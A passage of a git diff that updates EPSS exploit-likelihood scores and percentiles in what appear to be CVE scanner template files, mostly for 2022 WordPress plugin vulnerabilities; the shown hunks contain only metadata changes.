CVE-2022-0434 cwe-id: CWE-89 epss-score: 0.88588 - epss-percentile: 0.99485 + epss-percentile: 0.99484 cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml index b00b7fc3448..ebc54ffd83d 100644 --- a/http/cves/2022/CVE-2022-0437.yaml +++ b/http/cves/2022/CVE-2022-0437.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0437 cwe-id: CWE-79 epss-score: 0.12079 - epss-percentile: 0.93585 + epss-percentile: 0.9358 cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:*:node.js:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml index 329fcf48fb1..531b74e5ea3 100644 --- a/http/cves/2022/CVE-2022-0441.yaml +++ b/http/cves/2022/CVE-2022-0441.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0441 cwe-id: CWE-269,NVD-CWE-Other epss-score: 0.81347 - epss-percentile: 0.99131 + epss-percentile: 0.99134 cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml index 7466539fd29..610918610a8 100644 --- a/http/cves/2022/CVE-2022-0533.yaml +++ b/http/cves/2022/CVE-2022-0533.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0533 cwe-id: CWE-79 epss-score: 0.04689 - epss-percentile: 0.89028 + epss-percentile: 0.89025 cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml index 91326e9d116..a452c8c2c53 100644 --- a/http/cves/2022/CVE-2022-0535.yaml +++ b/http/cves/2022/CVE-2022-0535.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0535 cwe-id: CWE-79 epss-score: 0.0224 - epss-percentile: 0.84134 + epss-percentile: 0.8413 cpe: cpe:2.3:a:e2pdf:e2pdf:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index b9616e7e473..c63ad0ee968 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0591 cwe-id: CWE-918 epss-score: 0.87898 - epss-percentile: 0.99453 + epss-percentile: 0.99452 cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0592.yaml b/http/cves/2022/CVE-2022-0592.yaml index 76b03be2f0c..7d1d00e1b7c 100644 --- a/http/cves/2022/CVE-2022-0592.yaml +++ b/http/cves/2022/CVE-2022-0592.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0592 cwe-id: CWE-89 epss-score: 0.67367 - epss-percentile: 0.98509 + epss-percentile: 0.98512 cpe: cpe:2.3:a:mapsvg:mapsvg:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0594.yaml b/http/cves/2022/CVE-2022-0594.yaml index 790fb3431e2..1a25eae45c9 100644 --- a/http/cves/2022/CVE-2022-0594.yaml +++ b/http/cves/2022/CVE-2022-0594.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0594 cwe-id: CWE-863 epss-score: 0.43978 - epss-percentile: 0.97423 + epss-percentile: 0.9742 cpe: cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0595.yaml b/http/cves/2022/CVE-2022-0595.yaml index 25e233661bb..1215585f520 100644 --- a/http/cves/2022/CVE-2022-0595.yaml +++ b/http/cves/2022/CVE-2022-0595.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0595 cwe-id: CWE-79 epss-score: 0.05776 - epss-percentile: 0.90205 + epss-percentile: 0.90207 cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml index 47d3f894e0d..2cbde1442b4 100644 --- a/http/cves/2022/CVE-2022-0597.yaml +++ b/http/cves/2022/CVE-2022-0597.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0597 cwe-id: CWE-601 epss-score: 0.00964 - epss-percentile: 0.76062 + epss-percentile: 0.76054 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index 8c2410e1ca2..8a961e82d26 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0599 cwe-id: CWE-79 epss-score: 0.01606 - epss-percentile: 0.81333 + epss-percentile: 0.81324 cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index 7057af93e28..07f492e1df4 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0651 cwe-id: CWE-89 epss-score: 0.66896 - epss-percentile: 0.98492 + epss-percentile: 0.98494 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 48e09aae882..ef643bd4335 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0656 cwe-id: CWE-552 epss-score: 0.68162 - epss-percentile: 0.98536 + epss-percentile: 0.9854 cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml index 8ea4c1a070b..461ccc00f25 100644 --- a/http/cves/2022/CVE-2022-0658.yaml +++ b/http/cves/2022/CVE-2022-0658.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0658 cwe-id: CWE-89 epss-score: 0.47173 - epss-percentile: 0.97585 + epss-percentile: 0.9758 cpe: cpe:2.3:a:wielebenwir:commonsbooking:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index ee73898e10a..0ed5ca7aa15 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0660 cwe-id: CWE-209 epss-score: 0.07502 - epss-percentile: 0.91527 + epss-percentile: 0.91526 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0666.yaml b/http/cves/2022/CVE-2022-0666.yaml index 04a9f10329b..d79e760462d 100644 --- a/http/cves/2022/CVE-2022-0666.yaml +++ b/http/cves/2022/CVE-2022-0666.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0666 cwe-id: CWE-93 epss-score: 0.28901 - epss-percentile: 0.96416 + epss-percentile: 0.96419 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index 8f92992ecff..f5e5d8bbb54 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0678 cwe-id: CWE-79 epss-score: 0.01223 - epss-percentile: 0.78684 + epss-percentile: 0.78681 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index 343a9f388af..93b04da259d 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0735 cwe-id: CWE-863 - epss-score: 0.25456 - epss-percentile: 0.96045 + epss-score: 0.57385 + epss-percentile: 0.9807 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index f7e5b63c753..5b2c12d8a9b 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0747 cwe-id: CWE-89 epss-score: 0.89989 - epss-percentile: 0.9956 + epss-percentile: 0.99559 cpe: cpe:2.3:a:quantumcloud:infographic_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index 65a223a4dec..685df22083b 100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0760 cwe-id: CWE-89 - epss-score: 0.85913 - epss-percentile: 0.9936 + epss-score: 0.83869 + epss-percentile: 0.99269 cpe: cpe:2.3:a:quantumcloud:simple_link_directory:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0765.yaml b/http/cves/2022/CVE-2022-0765.yaml index 0a4c7f244e1..5b78c49b44d 100644 --- a/http/cves/2022/CVE-2022-0765.yaml +++ b/http/cves/2022/CVE-2022-0765.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-0765 cwe-id: CWE-79 - epss-score: 0.10813 - epss-percentile: 0.93138 + epss-score: 0.06676 + epss-percentile: 0.90959 cpe: cpe:2.3:a:loco_translate_project:loco_translate:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index e0f38d21d74..614182d25fd 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0769 cwe-id: CWE-89 - epss-score: 0.87617 - epss-percentile: 0.9944 + epss-score: 0.85972 + epss-percentile: 0.99365 cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index 2f3fbbdad66..72bf8a21c76 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0773 cwe-id: CWE-89 - epss-score: 0.75514 - epss-percentile: 0.9885 + epss-score: 0.71344 + epss-percentile: 0.98669 cpe: cpe:2.3:a:documentor_project:documentor:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0783.yaml b/http/cves/2022/CVE-2022-0783.yaml index fa45477a481..95f7cdc2865 100644 --- a/http/cves/2022/CVE-2022-0783.yaml +++ b/http/cves/2022/CVE-2022-0783.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0783 cwe-id: CWE-89 epss-score: 0.51271 - epss-percentile: 0.97788 + epss-percentile: 0.97784 cpe: cpe:2.3:a:themehigh:multiple_shipping_addresses_for_woocommerce:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index f477c04f08a..2593271c80a 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0784 cwe-id: CWE-89 epss-score: 0.72843 - epss-percentile: 0.98731 + epss-percentile: 0.9873 cpe: cpe:2.3:a:title_experiments_free_project:title_experiments_free:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml index 6541c799ba7..a61377467b8 100644 --- a/http/cves/2022/CVE-2022-0787.yaml +++ b/http/cves/2022/CVE-2022-0787.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0787 cwe-id: CWE-89 epss-score: 0.47173 - epss-percentile: 0.97585 + epss-percentile: 0.9758 cpe: cpe:2.3:a:limit_login_attempts_project:limit_login_attempts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index b852c7e692e..b02d7dfc1df 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0788 cwe-id: CWE-89 epss-score: 0.45285 - epss-percentile: 0.97494 + epss-percentile: 0.9749 cpe: cpe:2.3:a:wpmet:wp_fundraising_donation_and_crowdfunding_platform:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index 61020bc05e4..05c3e640b80 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0817 cwe-id: CWE-89 epss-score: 0.64589 - epss-percentile: 0.98392 + epss-percentile: 0.98395 cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index e4bbe2b6621..07716053da7 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0826 cwe-id: CWE-89 epss-score: 0.77316 - epss-percentile: 0.98931 + epss-percentile: 0.98929 cpe: cpe:2.3:a:wp-video-gallery-free_project:wp-video-gallery-free:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index c33ab947849..f5d2c745e94 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0864 cwe-id: CWE-79 epss-score: 0.04513 - epss-percentile: 0.888 + epss-percentile: 0.88799 cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index 3d71167fde1..f9661d7acd2 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0869 cwe-id: CWE-601 epss-score: 0.04224 - epss-percentile: 0.8843 + epss-percentile: 0.88431 cpe: cpe:2.3:a:spirit-project:spirit:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index c3dc5323dda..6f4fa0fc5ec 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-0870 cwe-id: CWE-918 - epss-score: 0.07241 - epss-percentile: 0.91365 + epss-score: 0.06006 + epss-percentile: 0.90411 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0873.yaml b/http/cves/2022/CVE-2022-0873.yaml index 0d42e8b0ac7..449375ce5c7 100644 --- a/http/cves/2022/CVE-2022-0873.yaml +++ b/http/cves/2022/CVE-2022-0873.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-0873 - epss-score: 0.00859 - epss-percentile: 0.74534 + epss-score: 0.00995 + epss-percentile: 0.76457 cwe-id: CWE-79 cpe: cpe:2.3:a:codeasily:gmedia_gallery:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2022/CVE-2022-0879.yaml b/http/cves/2022/CVE-2022-0879.yaml index cbf7e0e1533..5772b44bfa6 100644 --- a/http/cves/2022/CVE-2022-0879.yaml +++ b/http/cves/2022/CVE-2022-0879.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0879 cwe-id: CWE-79 epss-score: 0.01062 - epss-percentile: 0.77202 + epss-percentile: 0.77194 cpe: cpe:2.3:a:calderaforms:caldera_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index fcb86b0c72a..5441a09c8e2 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0885 cwe-id: CWE-862 - epss-score: 0.87398 - epss-percentile: 0.99431 + epss-score: 0.87241 + epss-percentile: 0.99426 cpe: cpe:2.3:a:memberhero:member_hero:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0899.yaml b/http/cves/2022/CVE-2022-0899.yaml index 87aaf746325..92a11530859 100644 --- a/http/cves/2022/CVE-2022-0899.yaml +++ b/http/cves/2022/CVE-2022-0899.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0899 cwe-id: CWE-79 epss-score: 0.08267 - epss-percentile: 0.91981 + epss-percentile: 0.91977 cpe: cpe:2.3:a:draftpress:header_footer_code_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index d2163957aef..0e69aa62a2f 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0928 cwe-id: CWE-79 epss-score: 0.04739 - epss-percentile: 0.89093 + epss-percentile: 0.8909 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index 0a8c3b6af57..1f769ee3776 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0948 cwe-id: CWE-89 epss-score: 0.6652 - epss-percentile: 0.98475 + epss-percentile: 0.98477 cpe: cpe:2.3:a:pluginbazaar:order_listener_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index 68bb58194cc..e7978f24d4f 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0949 cwe-id: CWE-89 epss-score: 0.69083 - epss-percentile: 0.98582 + epss-percentile: 0.98584 cpe: cpe:2.3:a:stopbadbots:block_and_stop_bad_bots:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index cba2adea3da..d98756c331c 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0954 cwe-id: CWE-79 epss-score: 0.05808 - epss-percentile: 0.90233 + epss-percentile: 0.90234 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index 951a7955421..a24a178d279 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0963 cwe-id: CWE-79 epss-score: 0.0815 - epss-percentile: 0.91922 + epss-percentile: 0.91918 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index 4b72041aaaf..9790e93b24c 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0968 cwe-id: CWE-190 epss-score: 0.01425 - epss-percentile: 0.80212 + epss-percentile: 0.80204 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml index 4d6c97d8e8b..a5d6c7da43b 100644 --- a/http/cves/2022/CVE-2022-1020.yaml +++ b/http/cves/2022/CVE-2022-1020.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1020 cwe-id: CWE-352 epss-score: 0.92138 - epss-percentile: 0.99694 + epss-percentile: 0.99693 cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1026.yaml b/http/cves/2022/CVE-2022-1026.yaml index 6fa0fcc310a..947e17536b1 100644 --- a/http/cves/2022/CVE-2022-1026.yaml +++ b/http/cves/2022/CVE-2022-1026.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-1026 cwe-id: CWE-522 epss-score: 0.86782 - epss-percentile: 0.99401 + epss-percentile: 0.99403 cpe: cpe:2.3:a:kyocera:net_viewer:*:*:*:*:*:*:*:* metadata: vendor: kyocera diff --git a/http/cves/2022/CVE-2022-1029.yaml b/http/cves/2022/CVE-2022-1029.yaml index 5c097d51186..cb65ec9d0ff 100644 --- a/http/cves/2022/CVE-2022-1029.yaml +++ b/http/cves/2022/CVE-2022-1029.yaml @@ -17,7 +17,7 @@ info: cvss-score: 4.8 cve-id: CVE-2022-1029 epss-score: 0.00197 - epss-percentile: 0.41755 + epss-percentile: 0.41722 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index eaa01e52ca3..93b69367bef 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1040 cwe-id: CWE-287 epss-score: 0.94439 - epss-percentile: 0.99987 + epss-percentile: 0.99986 cpe: cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml index 3b2e71a7bfa..b059b4f554c 100644 --- a/http/cves/2022/CVE-2022-1054.yaml +++ b/http/cves/2022/CVE-2022-1054.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-1054 cwe-id: CWE-862 epss-score: 0.12369 - epss-percentile: 0.93673 + epss-percentile: 0.93668 cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index e884f810644..bf05d7e918f 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-1058 cwe-id: CWE-601 epss-score: 0.23672 - epss-percentile: 0.95813 + epss-percentile: 0.95816 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml index 6d6a8aee3c1..7ea529adc3e 100644 --- a/http/cves/2022/CVE-2022-1119.yaml +++ b/http/cves/2022/CVE-2022-1119.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1119 cwe-id: CWE-22 epss-score: 0.90562 - epss-percentile: 0.99592 + epss-percentile: 0.9959 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index 25b2a8b6d8f..03675d849e6 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-1162 cwe-id: CWE-798 epss-score: 0.89723 - epss-percentile: 0.99541 + epss-percentile: 0.99543 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1168.yaml b/http/cves/2022/CVE-2022-1168.yaml index e565a281918..17b8980b417 100644 --- a/http/cves/2022/CVE-2022-1168.yaml +++ b/http/cves/2022/CVE-2022-1168.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1168 cwe-id: CWE-79 epss-score: 0.03356 - epss-percentile: 0.86982 + epss-percentile: 0.86984 cpe: cpe:2.3:a:eyecix:jobsearch_wp_job_board:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1170.yaml b/http/cves/2022/CVE-2022-1170.yaml index 8af92faba7d..f4e183c8286 100644 --- a/http/cves/2022/CVE-2022-1170.yaml +++ b/http/cves/2022/CVE-2022-1170.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-1170 cwe-id: CWE-79 epss-score: 0.00931 - epss-percentile: 0.75633 + epss-percentile: 0.75623 cpe: cpe:2.3:a:nootheme:jobmonster:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml index 3ed60773997..b563959131d 100644 --- a/http/cves/2022/CVE-2022-1221.yaml +++ b/http/cves/2022/CVE-2022-1221.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1221 cwe-id: CWE-79 epss-score: 0.25555 - epss-percentile: 0.96056 + epss-percentile: 0.96059 cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index 756d12e3622..092eaccbc9d 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1386 cwe-id: CWE-918 epss-score: 0.9361 - epss-percentile: 0.99824 + epss-percentile: 0.99826 cpe: cpe:2.3:a:fusion_builder_project:fusion_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index d1c7b6da1e2..9660ab89b8d 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1388 cwe-id: CWE-306 epss-score: 0.94456 - epss-percentile: 0.99992 + epss-percentile: 0.99991 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml index 5feabad0fc6..2c5247331a9 100644 --- a/http/cves/2022/CVE-2022-1391.yaml +++ b/http/cves/2022/CVE-2022-1391.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1391 cwe-id: CWE-22 epss-score: 0.66822 - epss-percentile: 0.98488 + epss-percentile: 0.98489 cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml index a92374b051a..4376cdef17e 100644 --- a/http/cves/2022/CVE-2022-1392.yaml +++ b/http/cves/2022/CVE-2022-1392.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1392 cwe-id: CWE-22 epss-score: 0.65164 - epss-percentile: 0.98414 + epss-percentile: 0.98416 cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1398.yaml b/http/cves/2022/CVE-2022-1398.yaml index 94ddcd33abb..a071755c9f0 